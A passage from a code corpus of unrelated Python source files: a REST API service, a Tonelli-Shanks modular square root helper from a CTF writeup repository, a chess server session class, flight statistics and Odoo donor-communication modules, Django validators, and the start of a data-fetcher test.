data = json.dumps(stats.get_costs_stats(period), cls=PGEncoder)
except StatisticException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
@route('/costs/credits_stats',Http.POST)
def credits_stats(self, request, period):
api_log.info('%s - [POST] %s/costs/credits_stats Data: period:"%s"' % (request.getHost().host, self.path, period))
try:
stats = CostsStatistics()
data = json.dumps(stats.get_credits_stats(period), cls=PGEncoder)
except StatisticException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
class ConfigurationRESTService:
path = '/configuration'
@route('/site', Http.GET)
def site(self, request):
api_log.info('%s - [GET] %s/site' % (request.getHost().host, self.path))
try:
config = Configuration()
data = json.dumps(config.get_site(), cls=PGEncoder)
except ConfigurationException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
@route('/locations', Http.GET)
def locations(self, request):
api_log.info('%s - [GET] %s/locations' % (request.getHost().host, self.path))
try:
config = Configuration()
data = json.dumps(config.get_locations(), cls=PGEncoder)
except ConfigurationException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
@route('/config', Http.GET)
def config(self, request):
api_log.info('%s - [GET] %s/config' % (request.getHost().host, self.path))
try:
config = Configuration()
data = json.dumps(config.get_site_config(), cls=PGEncoder)
except ConfigurationException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
def run_rapi():
api_log.info('Starting up RCCN API manager')
app = RESTResource((SubscriberRESTService(), ResellerRESTService(), CreditRESTService(), StatisticsRESTService(), SMSRESTService(), ConfigurationRESTService()))
app.run(8085)
if __name__ == "__main__":
run_rapi()
|
aweinstock314/aweinstock-ctf-writeups
|
cccamp_2019/prejudiced/bendersky_modsqrt.py
|
# https://eli.thegreenplace.net/2009/03/07/computing-modular-square-roots-in-python
def modular_sqrt(a, p):
""" Find a quadratic residue (mod p) of 'a'. p
must be an odd prime.
Solve the congruence of the form:
x^2 = a (mod p)
And returns x. Note that p - x is also a root.
0 is returned is no square root exists for
these a and p.
The Tonelli-Shanks algorithm is used (except
for some simple cases in which the solution
is known from an identity). This algorithm
runs in polynomial time (unless the
generalized Riemann hypothesis is false).
"""
# Simple cases
#
if legendre_symbol(a, p) != 1:
return 0
elif a == 0:
return 0
elif p == 2:
return 0
elif p % 4 == 3:
return pow(a, (p + 1) / 4, p)
# Partition p-1 to s * 2^e for an odd s (i.e.
# reduce all the powers of 2 from p-1)
#
s = p - 1
e = 0
while s % 2 == 0:
s /= 2
e += 1
# Find some 'n' with a legendre symbol n|p = -1.
# Shouldn't take long.
#
n = 2
while legendre_symbol(n, p) != -1:
n += 1
# Here be dragons!
# Read the paper "Square roots from 1; 24, 51,
# 10 to Dan Shanks" by Ezra Brown for more
# information
#
# x is a guess of the square root that gets better
# with each iteration.
# b is the "fudge factor" - by how much we're off
# with the guess. The invariant x^2 = ab (mod p)
# is maintained throughout the loop.
# g is used for successive powers of n to update
# both a and b
# r is the exponent - decreases with each update
#
x = pow(a, (s + 1) / 2, p)
b = pow(a, s, p)
g = pow(n, s, p)
r = e
while True:
t = b
m = 0
for m in xrange(r):
if t == 1:
break
t = pow(t, 2, p)
if m == 0:
return x
gs = pow(g, 2 ** (r - m - 1), p)
g = (gs * gs) % p
x = (x * gs) % p
b = (b * g) % p
r = m
def legendre_symbol(a, p):
""" Compute the Legendre symbol a|p using
Euler's criterion. p is a prime, a is
relatively prime to p (if p divides
a, then a|p = 0)
Returns 1 if a has a square root modulo
p, -1 otherwise.
"""
ls = pow(a, (p - 1) / 2, p)
return -1 if ls == p - 1 else ls
|
ecolitan/fatics
|
src/session.py
|
# Copyright (C) 2010 Wil Mahan <wmahan+fatics@gmail.com>
#
# This file is part of FatICS.
#
# FatICS is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# FatICS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with FatICS. If not, see <http://www.gnu.org/licenses/>.
#
import time
import copy
import var
import game
import timeseal
import partner
from game_list import GameList
# user state that is per-session and not saved to persistent storage
class Session(object):
def __init__(self, conn):
self.conn = conn
self.login_time = time.time()
self.last_command_time = time.time()
self.last_tell_user = None
self.last_tell_ch = None
self.last_opp = None
self.use_timeseal = False
self.ping_sent = []
self.ping_time = []
self.move_sent_timestamp = None
self.use_zipseal = False
self.check_for_timeseal = True
self.offers_sent = []
self.offers_received = []
self.game = None
self.ivars = var.varlist.get_default_ivars()
self.lag = 0
self.observed = GameList()
self.closed = False
self.seeks = []
self.partner = None
self.following = None
self.followed_by = set()
self.idlenotifying = set()
self.idlenotified_by = set()
def set_user(self, user):
self.user = user
self.conn.write(_('**** Starting FICS session as %s ****\n\n') % user.get_display_name())
def get_idle_time(self):
""" returns seconds """
assert(self.last_command_time is not None)
return time.time() - self.last_command_time
def get_online_time(self):
""" returns seconds """
assert(self.login_time is not None)
return time.time() - self.login_time
def close(self):
assert(not self.closed)
self.closed = True
# XXX this will not remove draw offers; game-related offers
# should probably be saved when a game is adjourned
for v in self.offers_sent[:]:
assert(v.a == self.user)
v.withdraw_logout()
for v in self.offers_received[:]:
assert(v.b == self.user)
v.decline_logout()
if self.partner:
#self.conn.write(_('Removing partnership with %s.\n') %
# partner.name)
self.partner.write_('\nYour partner, %s, has departed.\n',
self.user.name)
partner.end_partnership(self.partner, self.user)
if self.game:
self.game.leave(self.user)
assert(self.game == None)
del self.offers_received[:]
del self.offers_sent[:]
for u in self.idlenotified_by:
u.write_("\nNotification: %s, whom you were idlenotifying, has departed.\n", (self.user.name,))
u.session.idlenotifying.remove(self.user)
self.idlenotified_by.clear()
if self.followed_by:
for p in self.followed_by.copy():
p.write_('\n%s, whose games you were following, has logged out.\n', self.user.name)
self.followed_by = set()
# unobserve games
assert(self.user.session == self)
for g in self.observed.copy():
g.unobserve(self.user)
assert(not self.observed)
# remove seeks
if self.seeks:
for s in self.seeks[:]:
s.remove()
self.conn.write(_('Your seeks have been removed.\n'))
assert(not self.seeks)
def set_ivars_from_str(self, s):
"""Parse a %b string sent by Jin to set ivars before logging in."""
for (i, val) in enumerate(s):
self.ivars[var.ivar_number[i].name] = int(val)
self.conn.write("#Ivars set.\n")
def set_ivar(self, v, val):
if val is not None:
self.ivars[v.name] = val
else:
if v.name in self.ivars:
del self.ivars[v.name]
def ping(self, for_move=False):
# don't send another ping if one is already pending
assert(self.use_timeseal or self.use_zipseal)
# Always send a ping with a move in a game being played.
# Otherwise, send a ping if one is not alredy pending.
if for_move or not self.ping_sent:
if self.use_zipseal:
self.conn.write(timeseal.ZIPSEAL_PING)
else:
self.conn.write(timeseal.TIMESEAL_1_PING)
self.ping_sent.append((time.time(), for_move))
def pong(self, t):
assert(self.ping_sent)
sent_time, for_move = self.ping_sent.pop(0)
reply_time = time.time() - sent_time
if len(self.ping_time) > 9:
self.ping_time.pop(0)
self.ping_time.append(reply_time)
if for_move:
self.move_sent_timestamp = t
# vim: expandtab tabstop=4 softtabstop=4 shiftwidth=4 smarttab autoindent
|
kerel-fs/skylines
|
skylines/frontend/views/statistics.py
|
from flask import Blueprint, render_template, abort, request, jsonify
from sqlalchemy import func, distinct
from skylines.database import db
from skylines.lib.dbutil import get_requested_record
from skylines.lib.vary import vary
from skylines.model import User, Club, Flight, Airport
statistics_blueprint = Blueprint('statistics', 'skylines')
@statistics_blueprint.route('/')
@statistics_blueprint.route('/<page>/<id>')
@vary('accept')
def index(page=None, id=None):
if 'application/json' not in request.headers.get('Accept', ''):
return render_template('ember-page.jinja', active_page='statistics')
name = None
query = db.session.query(Flight.year.label('year'),
func.count('*').label('flights'),
func.count(distinct(Flight.pilot_id)).label('pilots'),
func.sum(Flight.olc_classic_distance).label('distance'),
func.sum(Flight.duration).label('duration'))
pilots_query = db.session.query(func.count(distinct(Flight.pilot_id)))
if page == 'pilot':
pilot = get_requested_record(User, id)
name = unicode(pilot)
query = query.filter(Flight.pilot_id == pilot.id)
elif page == 'club':
club = get_requested_record(Club, id)
name = unicode(club)
query = query.filter(Flight.club_id == club.id)
pilots_query = pilots_query.filter(Flight.club_id == club.id)
elif page == 'airport':
airport = get_requested_record(Airport, id)
name = unicode(airport)
query = query.filter(Flight.takeoff_airport_id == airport.id)
pilots_query = pilots_query.filter(Flight.takeoff_airport_id == airport.id)
elif page is not None:
abort(404)
query = query.filter(Flight.is_rankable())
query = query.group_by(Flight.year).order_by(Flight.year.desc())
if page == 'pilot':
sum_pilots = 0
else:
sum_pilots = pilots_query.scalar()
list = []
for row in query:
row.average_distance = row.distance / row.flights
row.average_duration = row.duration / row.flights
list.append({
'year': row.year,
'flights': row.flights,
'distance': row.distance,
'duration': row.duration.total_seconds(),
'pilots': row.pilots,
'average_distance': row.distance / row.flights,
'average_duration': row.duration.total_seconds() / row.flights,
})
return jsonify(name=name, years=list, sumPilots=sum_pilots)
|
ecino/compassion-switzerland
|
partner_communication_switzerland/models/partner_communication.py
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2016 Compassion CH (http://www.compassion.ch)
# Releasing children from poverty in Jesus' name
# @author: Emanuel Cino <ecino@compassion.ch>
#
# The licence is in the file __manifest__.py
#
##############################################################################
import base64
import time
import logging
import re
from ..wizards.generate_communication_wizard import SMS_CHAR_LIMIT, SMS_COST
from math import ceil
from collections import OrderedDict
from datetime import date, datetime
from io import BytesIO
from dateutil.relativedelta import relativedelta
from odoo.addons.sponsorship_compassion.models.product import GIFT_REF
from odoo import api, models, _, fields
from odoo.exceptions import MissingError, UserError
_logger = logging.getLogger(__name__)
try:
from pyPdf import PdfFileWriter, PdfFileReader
from bs4 import BeautifulSoup
except ImportError:
_logger.warning("Please install pypdf and bs4 for using the module")
class PartnerCommunication(models.Model):
_inherit = 'partner.communication.job'
event_id = fields.Many2one('crm.event.compassion', 'Event')
ambassador_id = fields.Many2one('res.partner', 'Ambassador')
currency_id = fields.Many2one('res.currency', compute='_compute_currency')
utm_campaign_id = fields.Many2one('utm.campaign')
sms_cost = fields.Float()
sms_provider_id = fields.Many2one(
'sms.provider', 'SMS Provider',
default=lambda self: self.env.ref('sms_939.large_account_id', False),
readonly=False)
@api.model
def send_mode_select(self):
modes = super(PartnerCommunication, self).send_mode_select()
modes.append(('sms', _('SMS')))
return modes
@api.multi
def _compute_currency(self):
chf = self.env.ref('base.CHF')
for wizard in self:
wizard.currency_id = chf.id
def get_correspondence_attachments(self):
"""
Include PDF of letters if the send_mode is to print the letters.
:return: dict {attachment_name: [report_name, pdf_data]}
"""
self.ensure_one()
attachments = dict()
# Report is used for print configuration
report = 'report_compassion.b2s_letter'
letters = self.get_objects()
if self.send_mode == 'physical':
for letter in self.get_objects():
try:
attachments[letter.file_name] = [
report, self._convert_pdf(letter.letter_image)]
except MissingError:
_logger.warn("Missing letter image", exc_info=True)
self.send_mode = False
self.auto_send = False
self.message_post(
_('The letter image is missing!'), _("Missing letter"))
continue
else:
# Attach directly a zip in the letters
letters.attach_zip()
return attachments
def get_birthday_bvr(self):
"""
Attach birthday gift slip with background for sending by e-mail
:return: dict {attachment_name: [report_name, pdf_data]}
"""
self.ensure_one()
attachments = dict()
background = self.send_mode and 'physical' not in self.send_mode
sponsorships = self.get_objects().filtered(
lambda s: not s.birthday_paid)
gifts_to = sponsorships[:1].gift_partner_id
if sponsorships and gifts_to == self.partner_id:
birthday_gift = self.env['product.product'].search([
('default_code', '=', GIFT_REF[0])], limit=1)
attachments = sponsorships.get_bvr_gift_attachment(
birthday_gift, background)
return attachments
def get_graduation_bvr(self):
"""
Attach graduation gift slip with background for sending by e-mail
:return: dict {attachment_name: [report_name, pdf_data]}
"""
self.ensure_one()
attachments = dict()
background = self.send_mode and 'physical' not in self.send_mode
sponsorships = self.get_objects()
graduation = self.env['product.product'].search([
('default_code', '=', GIFT_REF[4])], limit=1)
gifts_to = sponsorships[0].gift_partner_id
if sponsorships and gifts_to == self.partner_id:
attachments = sponsorships.get_bvr_gift_attachment(
graduation, background)
return attachments
def get_family_slip_attachment(self):
"""
Attach family gift slip with background for sending by e-mail
:return: dict {attachment_name: [report_name, pdf_data]}
"""
self.ensure_one()
attachments = dict()
background = self.send_mode and 'physical' not in self.send_mode
sponsorships = self.get_objects()
family = self.env['product.product'].search([
('default_code', '=', GIFT_REF[2])], limit=1)
gifts_to = sponsorships[0].gift_partner_id
if sponsorships and gifts_to == self.partner_id:
attachments = sponsorships.get_bvr_gift_attachment(
family, background)
return attachments
def get_reminder_bvr(self):
"""
Attach sponsorship due payment slip with background for sending by
e-mail.
:return: dict {attachment_name: [report_name, pdf_data]}
"""
self.ensure_one()
sponsorships = self.get_objects()
# Verify big due periods
if len(sponsorships.mapped('months_due')) > 3:
self.need_call = 'before_sending'
payment_mode = sponsorships.with_context(lang='en_US').mapped(
'payment_mode_id.name')[0]
# LSV-DD Waiting reminders special case
if 'Waiting Reminder' in self.config_id.name and (
'LSV' in payment_mode or 'Postfinance' in payment_mode):
if self.partner_id.bank_ids:
# We received the bank info but withdrawal didn't work.
# Mark to call in order to verify the situation.
self.need_call = 'before_sending'
else:
# Don't put payment slip if we just wait the authorization form
return dict()
# Put product sponsorship to print the payment slip for physical print.
if self.send_mode and 'physical' in self.send_mode:
self.product_id = self.env['product.product'].search([
('default_code', '=', 'sponsorship')], limit=1)
return dict()
# In other cases, attach the payment slip.
report_name = 'report_compassion.bvr_due'
return {
_('sponsorship due.pdf'): [
report_name,
base64.b64encode(self.env['report'].get_pdf(
sponsorships.ids, report_name,
data={'background': True, 'doc_ids': sponsorships.ids}
))
]
}
def get_label_from_sponsorship(self):
"""
Attach sponsorship labels. Used from communication linked to children.
:return: dict {attachment_name: [report_name, pdf_data]}
"""
self.ensure_one()
sponsorships = self.get_objects()
return self.get_label_attachment(sponsorships)
def get_label_attachment(self, sponsorships=False):
"""
Attach sponsorship labels. Used from communication linked to children.
:return: dict {attachment_name: [report_name, pdf_data]}
"""
self.ensure_one()
if not sponsorships:
sponsorships = self.env['recurring.contract']
children = self.get_objects()
for child in children:
sponsorships += child.sponsorship_ids[0]
attachments = dict()
label_print = self.env['label.print'].search([
('name', '=', 'Sponsorship Label')], limit=1)
label_brand = self.env['label.brand'].search([
('brand_name', '=', 'Herma A4')], limit=1)
label_format = self.env['label.config'].search([
('name', '=', '4455 SuperPrint WeiB')], limit=1)
label_wizard = self.env['label.print.wizard'].with_context({
'active_ids': sponsorships.ids,
'active_model': 'recurring.contract',
'label_print': label_print.id,
'must_skip_send_to_printer': True
}).create({
'brand_id': label_brand.id,
'config_id': label_format.id,
'number_of_labels': 33
})
label_data = label_wizard.get_report_data()
report_name = 'label.report_label'
attachments[_('sponsorship labels.pdf')] = [
report_name,
base64.b64encode(
label_wizard.env['report'].get_pdf(
label_wizard.ids, report_name, data=label_data))
]
return attachments
def get_child_picture_attachment(self):
"""
Attach child pictures to communication. It directly attach them
to the communication if sent by e-mail and therefore does
return an empty dictionary.
:return: dict {}
"""
self.ensure_one()
res = dict()
if self.send_mode and 'physical' not in self.send_mode:
# Prepare attachments in case the communication is sent by e-mail
children = self.get_objects()
attachments = self.env['ir.attachment']
for child in children:
name = child.local_id + ' ' + child.last_photo_date + '.jpg'
attachments += attachments.create({
'name': name,
'datas_fname': name,
'res_model': self._name,
'res_id': self.id,
'datas': child.fullshot,
})
self.with_context(no_print=True).ir_attachment_ids = attachments
else:
self.ir_attachment_ids = False
return res
def get_yearly_payment_slips_2bvr(self):
return self.get_yearly_payment_slips(bv_number=2)
def get_yearly_payment_slips(self, bv_number=3):
"""
Attach payment slips
:param bv_number number of BV on a page (switch between 2BV/3BV page)
:return: dict {attachment_name: [report_name, pdf_data]}
"""
self.ensure_one()
assert bv_number in (2, 3)
sponsorships = self.get_objects()
payment_mode_bvr = self.env.ref(
'sponsorship_switzerland.payment_mode_bvr')
attachments = dict()
# IF payment mode is BVR and partner is paying
# attach sponsorship payment slips
pay_bvr = sponsorships.filtered(
lambda s: s.payment_mode_id == payment_mode_bvr and
s.partner_id == self.partner_id)
report_obj = self.env['report']
if pay_bvr and pay_bvr.must_pay_next_year():
today = date.today()
date_start = today.replace(today.year + 1, 1, 1)
date_stop = date_start.replace(month=12, day=31)
report_name = 'report_compassion.{}bvr_sponsorship'.format(
bv_number)
attachments.update({
_('sponsorship payment slips.pdf'): [
report_name,
base64.b64encode(report_obj.get_pdf(
pay_bvr.ids, report_name,
data={
'doc_ids': pay_bvr.ids,
'date_start': fields.Date.to_string(date_start),
'date_stop': fields.Date.to_string(date_stop),
'background': self.send_mode != 'physical'
}
))
]
})
# Attach gifts for correspondents
pays_gift = self.env['recurring.contract']
for sponsorship in sponsorships:
if sponsorship.mapped(sponsorship.send_gifts_to) == \
self.partner_id:
pays_gift += sponsorship
if pays_gift:
report_name = 'report_compassion.{}bvr_gift_sponsorship'.format(
bv_number)
product_ids = self.env['product.product'].search([
('default_code', 'in', GIFT_REF[:3])
]).ids
attachments.update({
_('sponsorship gifts.pdf'): [
report_name,
base64.b64encode(report_obj.get_pdf(
pays_gift.ids, report_name,
data={
'doc_ids': pays_gift.ids,
'product_ids': product_ids
}
))
]
})
return attachments
def get_childpack_attachment(self):
self.ensure_one()
lang = self.partner_id.lang
sponsorships = self.get_objects()
exit_conf = self.env.ref(
'partner_communication_switzerland.lifecycle_child_planned_exit')
if self.config_id == exit_conf and sponsorships.mapped(
'sub_sponsorship_id'):
sponsorships = sponsorships.mapped('sub_sponsorship_id')
children = sponsorships.mapped('child_id')
# Always retrieve latest information before printing dossier
children.get_infos()
report_name = 'report_compassion.childpack_small'
return {
_('child dossier.pdf'): [
report_name,
base64.b64encode(self.env['report'].get_pdf(
children.ids, report_name, data={
'lang': lang,
'is_pdf': self.send_mode != 'physical',
'type': report_name,
}))
]
}
def get_tax_receipt(self):
self.ensure_one()
res = {}
if self.send_mode == 'digital':
report_name = 'report_compassion.tax_receipt'
data = {
'doc_ids': self.partner_id.ids,
'year': self.env.context.get('year', date.today().year - 1),
'lang': self.partner_id.lang,
}
res = {
_('tax receipt.pdf'): [
report_name,
base64.b64encode(
self.env['report'].with_context(
must_skip_send_to_printer=True).get_pdf(
self.partner_id.ids, report_name, data=data))
]
}
return res
@api.multi
def send(self):
"""
- Prevent sending communication when invoices are being reconciled
- Mark B2S correspondence as read when printed.
- Postpone no money holds when reminders sent.
- Update donor tag
- Sends SMS for sms send_mode
:return: True
"""
sms_jobs = self.filtered(lambda j: j.send_mode == 'sms')
sms_jobs.send_by_sms()
other_jobs = self - sms_jobs
for job in other_jobs.filtered(lambda j: j.model in (
'recurring.contract', 'account.invoice')):
queue_job = self.env['queue.job'].search([
('channel', '=', 'root.group_reconcile'),
('state', '!=', 'done'),
], limit=1)
if queue_job:
invoices = self.env['account.invoice'].browse(
queue_job.record_ids)
if job.partner_id in invoices.mapped('partner_id'):
retry = 0
state = queue_job.state
while state != 'done' and retry < 5:
if queue_job.state == 'failed':
raise UserError(_(
"A reconcile job has failed. Please call "
"an admin for help."
))
_logger.info("Reconcile job is processing! Going in "
"sleep for five seconds...")
time.sleep(5)
state = queue_job.read(['state'])[0]['state']
retry += 1
if queue_job.state != 'done':
raise UserError(_(
"Some invoices of the partner are just being "
"reconciled now. Please wait the process to finish"
" before printing the communication."
))
super(PartnerCommunication, other_jobs).send()
b2s_printed = other_jobs.filtered(
lambda c: c.config_id.model == 'correspondence' and
c.send_mode == 'physical' and c.state == 'done')
if b2s_printed:
letters = b2s_printed.get_objects()
if letters:
letters.write({
'letter_delivered': True,
})
# No money extension
no_money_1 = self.env.ref('partner_communication_switzerland.'
'sponsorship_waiting_reminder_1')
no_money_2 = self.env.ref('partner_communication_switzerland.'
'sponsorship_waiting_reminder_2')
no_money_3 = self.env.ref('partner_communication_switzerland.'
'sponsorship_waiting_reminder_3')
settings = self.env['availability.management.settings']
first_extension = settings.get_param('no_money_hold_duration')
second_extension = settings.get_param('no_money_hold_extension')
for communication in other_jobs:
extension = False
if communication.config_id == no_money_1:
extension = first_extension + 7
elif communication.config_id == no_money_2:
extension = second_extension + 7
elif communication.config_id == no_money_3:
extension = 10
if extension:
holds = communication.get_objects().mapped('child_id.hold_id')
for hold in holds:
expiration = datetime.now() + relativedelta(days=extension)
hold.expiration_date = fields.Datetime.to_string(
expiration)
donor = self.env.ref('partner_compassion.res_partner_category_donor')
partners = other_jobs.filtered(
lambda j: j.config_id.model == 'account.invoice.line' and
donor not in j.partner_id.category_id).mapped('partner_id')
partners.write({'category_id': [(4, donor.id)]})
return True
@api.multi
def send_by_sms(self):
"""
Sends communication jobs with SMS 939 service.
:return: list of sms_texts
"""
link_pattern = re.compile(r'<a href="(.*)">(.*)</a>', re.DOTALL)
sms_medium_id = self.env.ref('sms_sponsorship.utm_medium_sms').id
sms_texts = []
for job in self.filtered('partner_mobile'):
sms_text = job.convert_html_for_sms(link_pattern, sms_medium_id)
sms_texts.append(sms_text)
sms_wizard = self.env['sms.sender.wizard'].with_context(
partner_id=job.partner_id.id).create({
'subject': job.subject,
'text': sms_text,
'sms_provider_id': job.sms_provider_id.id
})
sms_wizard.send_sms_partner()
job.write({
'state': 'done',
'sent_date': fields.Datetime.now(),
'sms_cost': ceil(
float(len(sms_text)) / SMS_CHAR_LIMIT) * SMS_COST
})
return sms_texts
def convert_html_for_sms(self, link_pattern, sms_medium_id):
"""
Converts HTML into simple text for SMS.
First replace links with short links using Link Tracker.
Then clean HTML using BeautifulSoup library.
:param link_pattern: the regex pattern for replacing links
:param sms_medium_id: the associated utm.medium id for generated links
:return: Clean text with short links for SMS use.
"""
self.ensure_one()
source_id = self.config_id.source_id.id
def _replace_link(match):
full_link = match.group(1).replace('&', '&')
short_link = self.env['link.tracker'].create({
'url': full_link,
'campaign_id': self.utm_campaign_id.id or self.env.ref(
'partner_communication_switzerland.'
'utm_campaign_communication').id,
'medium_id': sms_medium_id,
'source_id': source_id
})
return short_link.short_url
links_converted_text = link_pattern.sub(_replace_link, self.body_html)
soup = BeautifulSoup(links_converted_text, "lxml")
return soup.get_text().strip()
@api.multi
def open_related(self):
""" Select a better view for invoice lines. """
res = super(PartnerCommunication, self).open_related()
if self.config_id.model == 'account.invoice.line':
res['context'] = self.with_context(
tree_view_ref='sponsorship_compassion'
'.view_invoice_line_partner_tree',
group_by=False
).env.context
return res
def get_new_dossier_attachments(self):
"""
Returns pdfs for the New Dossier Communication, including:
- Sponsorship payment slips (if payment is True)
- Small Childpack
- Sponsorship labels (if correspondence is True)
- Child picture
:return: dict {attachment_name: [report_name, pdf_data]}
"""
self.ensure_one()
attachments = OrderedDict()
report_obj = self.env['report']
account_payment_mode_obj = self.env['account.payment.mode']\
.with_context(lang='en_US')
lsv_dd_modes = account_payment_mode_obj.search(
['|', ('name', 'like', 'Direct Debit'), ('name', 'like', 'LSV')])
permanent_order = self.env.ref(
'sponsorship_switzerland.payment_mode_permanent_order')
sponsorships = self.get_objects()
# Sponsorships included for payment slips
bv_sponsorships = sponsorships.filtered(
# 1. Needs to be payer
lambda s: s.partner_id == self.partner_id and
# 2. Permanent Order are always included
s.payment_mode_id == permanent_order or (
# 3. LSV/DD are never included
s.payment_mode_id not in lsv_dd_modes and
# 4. If already paid they are not included
not s.period_paid)
)
write_sponsorships = sponsorships.filtered(
lambda s: s.correspondent_id == self.partner_id)
# Include all active sponsorships for Permanent Order
bv_sponsorships |= bv_sponsorships\
.filtered(lambda s: s.payment_mode_id == permanent_order)\
.mapped('group_id.contract_ids').filtered(
lambda s: s.state in ('active', 'waiting'))
# Payment slips
if bv_sponsorships:
report_name = 'report_compassion.3bvr_sponsorship'
if bv_sponsorships.mapped('payment_mode_id') == permanent_order:
# One single slip is enough for permanent order.
report_name = 'report_compassion.bvr_sponsorship'
attachments.update({
_('sponsorship payment slips.pdf'): [
report_name,
base64.b64encode(report_obj.get_pdf(
bv_sponsorships.ids, report_name,
data={
'doc_ids': bv_sponsorships.ids,
'background': self.send_mode != 'physical'
}
))
]
})
# Childpack if not a SUB of planned exit.
lifecycle = sponsorships.mapped('parent_id.child_id.lifecycle_ids')
planned_exit = lifecycle and lifecycle[0].type == 'Planned Exit'
if not planned_exit:
attachments.update(self.get_childpack_attachment())
# Labels
if write_sponsorships:
attachments.update(self.get_label_attachment(write_sponsorships))
# Child picture
report_name = 'partner_communication_switzerland.child_picture'
child_ids = sponsorships.mapped('child_id').ids
attachments.update({
_('child picture.pdf'): [
report_name,
base64.b64encode(report_obj.get_pdf(
child_ids, report_name,
data={'doc_ids': child_ids}
))
]
})
# Country information
for field_office in self.get_objects().mapped(
'child_id.field_office_id'):
country_pdf = field_office.country_info_pdf
if country_pdf:
attachments.update({
field_office.name + ".pdf": [
'partner_communication_switzerland.field_office_info',
country_pdf
]
})
return attachments
def get_csp_attachment(self):
self.ensure_one()
attachments = OrderedDict()
report_obj = self.env['report']
account_payment_mode_obj = self.env['account.payment.mode']
csp = self.get_objects()
# Include all active csp for Permanent Order
if 'Permanent Order' in csp.with_context(
lang='en_US').mapped('payment_mode_id.name'):
csp += csp.mapped(
'group_id.contract_ids').filtered(
lambda s: s.state == 'active')
is_payer = self.partner_id in csp.mapped('partner_id')
make_payment_pdf = True
# LSV/DD don't need a payment slip
groups = csp.mapped('group_id')
lsv_dd_modes = account_payment_mode_obj.search(
['|', ('name', 'like', 'Direct Debit'), ('name', 'like', 'LSV')])
lsv_dd_groups = groups.filtered(
lambda r: r.payment_mode_id in lsv_dd_modes)
if len(lsv_dd_groups) == len(groups):
make_payment_pdf = False
# If partner already paid, avoid payment slip
if len(csp.filtered('period_paid')) == len(csp):
make_payment_pdf = False
# Payment slips
if is_payer and make_payment_pdf:
report_name = 'report_compassion.3bvr_sponsorship'
attachments.update({
_('csv payment slips.pdf'): [
report_name,
base64.b64encode(report_obj.get_pdf(
csp.ids, report_name,
data={
'doc_ids': csp.ids,
'background': self.send_mode != 'physical'
}
))
]
})
return attachments
def _convert_pdf(self, pdf_data):
"""
Converts all pages of PDF in A4 format if communication is
printed.
:param pdf_data: binary data of original pdf
:return: binary data of converted pdf
"""
if self.send_mode != 'physical':
return pdf_data
pdf = PdfFileReader(BytesIO(base64.b64decode(pdf_data)))
convert = PdfFileWriter()
a4_width = 594.48
a4_height = 844.32 # A4 units in PyPDF
for i in xrange(0, pdf.numPages):
# translation coordinates
tx = 0
ty = 0
page = pdf.getPage(i)
corner = [float(x) for x in page.mediaBox.getUpperRight()]
if corner[0] > a4_width or corner[1] > a4_height:
page.scaleBy(max(a4_width / corner[0], a4_height / corner[1]))
elif corner[0] < a4_width or corner[1] < a4_height:
tx = (a4_width - corner[0]) / 2
ty = (a4_height - corner[1]) / 2
convert.addBlankPage(a4_width, a4_height)
convert.getPage(i).mergeTranslatedPage(page, tx, ty)
output_stream = BytesIO()
convert.write(output_stream)
output_stream.seek(0)
return base64.b64encode(output_stream.read())
|
amcat/amcat-dashboard
|
dashboard/util/validators.py
|
from django.core.exceptions import ValidationError
from django.utils.deconstruct import deconstructible
def page_filters_validator(val):
if not isinstance(val, dict):
raise ValidationError
if not all(isinstance(v, list) for v in val.values()):
raise ValidationError
if not all(isinstance(v, str) for vs in val.values() for v in vs):
raise ValidationError
@deconstructible
class HighchartsCustomizationValidator:
def __init__(self, properties):
self.properties = properties
def __call__(self, value):
errors = []
custom_props = dict(self.properties)
if not isinstance(value, dict):
raise ValidationError("Root element must be a dict, got {}".format(type(value)))
for k, v in value.items():
try:
prop = custom_props[k]
except KeyError:
errors.append(ValidationError("Unknown property {}".format(k)))
continue
if not isinstance(v, prop.type):
raise ValidationError("Invalid type for {}, expected {!s}, got {!s}".format(k, prop.type, type(v)))
if errors:
raise ValidationError(errors)
|
Widukind/dlstats
|
dlstats/tests/fetchers/test_insee.py
|
# -*- coding: utf-8 -*-
from copy import deepcopy
from datetime import datetime
import os
from pprint import pprint
from dlstats.fetchers.insee import INSEE as Fetcher
from dlstats import constants
import unittest
from unittest import mock
import httpretty
from dlstats.tests.fetchers.base import BaseFetcherTestCase
from dlstats.tests.resources import xml_samples
from dlstats.tests.base import RESOURCES_DIR as BASE_RESOURCES_DIR
RESOURCES_DIR = os.path.abspath(os.path.join(BASE_RESOURCES_DIR, "insee"))
def get_dimensions_from_dsd(self, xml_dsd=None, provider_name=None, dataset_code=None, dsd_id=None):
dimension_keys = ['FREQ', 'NATURE', 'PRODUIT']
dimensions = {
'FREQ': {'M': 'M'},
'NATURE': {},
'PRODUIT': {},
}
return dimension_keys, dimensions
def get_dimensions_from_dsd_CHO_AN_AGE(self, xml_dsd=None, provider_name=None, dataset_code=None, dsd_id=None):
dimension_keys = ['INDICATEUR', 'SEXE', 'AGE']
dimensions = {
'INDICATEUR': {'Nbre': 'Nbre'},
'SEXE': {},
'AGE': {},
}
return dimension_keys, dimensions
LOCAL_DATASETS_UPDATE = {
"IPI-2010-A21": {
"categories_root": ['COMPTA-NAT', 'CONDITIONS-VIE-SOCIETE', 'DEMO-ENT',
'ECHANGES-EXT', 'ENQ-CONJ', 'MARCHE-TRAVAIL',
'POPULATION', 'PRIX', 'PRODUCTION-ENT',
'SALAIRES-REVENUS', 'SERVICES-TOURISME-TRANSPORT',
'SRGDP'],
"concept_keys": ['base-per', 'decimals', 'embargo-time', 'freq', 'idbank', 'last-update', 'nature', 'obs-status', 'produit', 'ref-area', 'time-per-collect', 'title', 'unit-measure', 'unit-mult'],
